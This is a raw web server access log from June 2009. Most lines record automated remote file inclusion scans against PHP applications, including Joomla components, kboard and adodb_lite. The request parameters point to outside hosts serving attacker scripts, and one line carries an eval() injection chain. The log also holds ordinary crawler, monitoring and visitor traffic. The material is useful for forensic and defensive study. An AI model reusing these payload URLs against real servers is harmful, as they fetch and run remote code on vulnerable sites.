77.232.68.137 - - [28/Jun/2009:06:00:19 -0400] "GET /logs/access_log.Q109061300/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
203.151.217.29 - - [28/Jun/2009:06:00:49 -0400] "GET /logs/access_log.Q109052900%20%20/components/com_mambatstaff/mambats/images/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
203.151.217.29 - - [28/Jun/2009:06:00:54 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_mambatstaff/mambats/images/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:01:35 -0400] "GET /logs/access_log.Q109061100%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:06:01:48 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:06:01:48 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:06:02:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.75.60.116 - - [28/Jun/2009:06:03:32 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:03:53 -0400] "GET /logs/access_log.Q109060900%20%20/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:03:53 -0400] "GET /logs/access_log.Q109051600%20%20/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:06:04:00 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:05:31 -0400] "GET /logs/access_log.Q109060900%20%20/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:05:31 -0400] "GET /logs/access_log.Q109051600%20%20/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:07:37 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:07:37 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:07:38 -0400] "GET /logs/access_log.Q109052300%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:06:07:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.178.147.253 - - [28/Jun/2009:06:08:55 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705)"
91.178.147.253 - - [28/Jun/2009:06:08:55 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705)"
91.178.147.253 - - [28/Jun/2009:06:08:55 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705)"
91.178.147.253 - - [28/Jun/2009:06:08:55 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705)"
91.178.147.253 - - [28/Jun/2009:06:09:08 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc++M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):03+RNSUBS(S0040):0 HTTP/1.1" 200 516 "http://pipl.com/directory/name/Bone/Ace" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705)"
91.178.147.253 - - [28/Jun/2009:06:09:08 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705)"
66.249.71.204 - - [28/Jun/2009:06:09:41 -0400] "GET /logs/error_log.Q108010400 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.147.29.190 - - [28/Jun/2009:06:10:08 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:08 -0400] "GET /bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:08 -0400] "GET /logs/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:08 -0400] "GET /logs/access_log.Q109051600%20%20/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:10 -0400] "GET /logs/access_log.Q109051600%20%20/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:10 -0400] "GET /bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:10 -0400] "GET /logs/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:13 -0400] "GET /logs/access_log.Q109051600/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:13 -0400] "GET /logs/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:13 -0400] "GET /bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:14 -0400] "GET /logs/access_log.Q109060900%20%20/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:15 -0400] "GET /logs/access_log.Q109060900%20%20/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:17 -0400] "GET /logs/access_log.Q109060900/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.131.116.12 - - [28/Jun/2009:06:10:20 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:06:10:20 -0400] "GET /logs/access_log.Q109051800//include/print_category.php?setup[use_category]=1&dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:06:10:22 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:06:10:35 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:06:10:35 -0400] "GET /logs/access_log.Q109051800//include/print_category.php?setup[use_category]=1&dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:06:10:36 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
122.153.28.140 - - [28/Jun/2009:06:10:39 -0400] "GET /logs/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:39 -0400] "GET /bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:42 -0400] "GET /logs/access_log.Q109051600/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:43 -0400] "GET /bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:46 -0400] "GET /logs/access_log.Q109060900/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:53 -0400] "GET /logs/access_log.Q109051600/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:53 -0400] "GET /logs/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:10:53 -0400] "GET /logs/access_log.Q109060900/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.249.71.16 - - [28/Jun/2009:06:11:25 -0400] "GET /images/items/682415_full.jpg HTTP/1.1" 200 6964 "-" "Googlebot-Image/1.0"
124.0.103.194 - - [28/Jun/2009:06:11:40 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.0.103.194 - - [28/Jun/2009:06:11:40 -0400] "GET //index.php?option=com_custompages&cpage=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.0.103.194 - - [28/Jun/2009:06:11:47 -0400] "GET /logs/access_log.Q109052300%20%20//index.php?option=com_custompages&cpage=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.131.116.12 - - [28/Jun/2009:06:11:50 -0400] "GET /logs/access_log.Q109051600//include/print_category.php?setup[use_category]=1&dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:06:12:02 -0400] "GET /logs/access_log.Q109051600//include/print_category.php?setup[use_category]=1&dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
209.59.12.99 - - [28/Jun/2009:06:12:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.232.68.137 - - [28/Jun/2009:06:13:31 -0400] "GET /?sourcedir=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
77.232.68.137 - - [28/Jun/2009:06:13:31 -0400] "GET /logs/?sourcedir=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 200 7314 "-" "Mozilla/5.0"
77.232.68.137 - - [28/Jun/2009:06:13:31 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
77.232.68.137 - - [28/Jun/2009:06:14:56 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
77.232.68.137 - - [28/Jun/2009:06:14:57 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:17:18 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:17:18 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:17:18 -0400] "GET /logs/access_log.Q109061300//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:17:29 -0400] "GET /logs/access_log.Q109061200//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:17:30 -0400] "GET /logs//components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:17:30 -0400] "GET //components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:17:36 -0400] "GET /logs/access_log.Q109050900//components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
124.0.103.194 - - [28/Jun/2009:06:17:41 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:06:17:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [28/Jun/2009:06:18:09 -0400] "GET /logs/access_log.Q109062300//components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
72.30.142.179 - - [28/Jun/2009:06:18:31 -0400] "GET /logs/error_log.Q108102300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.147.29.190 - - [28/Jun/2009:06:19:56 -0400] "GET /logs/access_log.Q109050900%20%20//components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:19:57 -0400] "GET /logs/access_log.Q109051600/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:19:57 -0400] "GET /logs/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:19:57 -0400] "GET /bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:19:57 -0400] "GET /bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:19:57 -0400] "GET /logs/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:19:57 -0400] "GET /logs/access_log.Q109051600/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:20:03 -0400] "GET /bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:20:03 -0400] "GET /logs/access_log.Q109051600/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:20:03 -0400] "GET /logs/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:20:03 -0400] "GET /logs/access_log.Q109060900/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:20:07 -0400] "GET /logs/access_log.Q109060900/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:20:11 -0400] "GET /bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:20:11 -0400] "GET /logs/access_log.Q109051600/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:20:11 -0400] "GET /logs/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:20:11 -0400] "GET /logs/access_log.Q109060900/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:06:20:11 -0400] "GET /logs/access_log.Q109060900/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:20:16 -0400] "GET /logs/access_log.Q109062300%20%20//components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:20:29 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:20:29 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:20:29 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:20:52 -0400] "GET /logs/access_log.Q109061300%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:20:57 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:21:00 -0400] "GET /logs/access_log.Q109061200%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jun/2009:06:21:46 -0400] "GET /logs/error_log.Q108033000 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.147.29.190 - - [28/Jun/2009:06:22:45 -0400] "GET /logs/access_log.Q109060300%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:06:22:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [28/Jun/2009:06:22:56 -0400] "GET /logs/access_log.Q109050900%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:23:04 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:23:04 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:23:04 -0400] "GET /logs/access_log.Q109052500//modules/My_eGallery/public/displayCategory.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:23:14 -0400] "GET /logs/access_log.Q109052200//modules/My_eGallery/public/displayCategory.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:24:51 -0400] "GET /logs/access_log.Q109052500%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:24:52 -0400] "GET /logs/access_log.Q109052200%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
125.131.116.12 - - [28/Jun/2009:06:24:54 -0400] "GET /logs/access_log.Q109051800%20//include/print_category.php?setup[use_category]=1&dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:06:26:07 -0400] "GET /logs/access_log.Q109051800%20//include/print_category.php?setup[use_category]=1&dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
65.23.158.226 - - [28/Jun/2009:06:26:32 -0400] "GET /logs/access_log.Q109051700//components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.23.158.226 - - [28/Jun/2009:06:26:32 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.23.158.226 - - [28/Jun/2009:06:26:32 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 241 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.23.158.226 - - [28/Jun/2009:06:26:56 -0400] "GET /logs/access_log.Q109052600//components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
209.59.12.99 - - [28/Jun/2009:06:27:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.17.99.13 - - [28/Jun/2009:06:28:21 -0400] "GET //include/mail.inc.php?skin_board_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:06:28:21 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
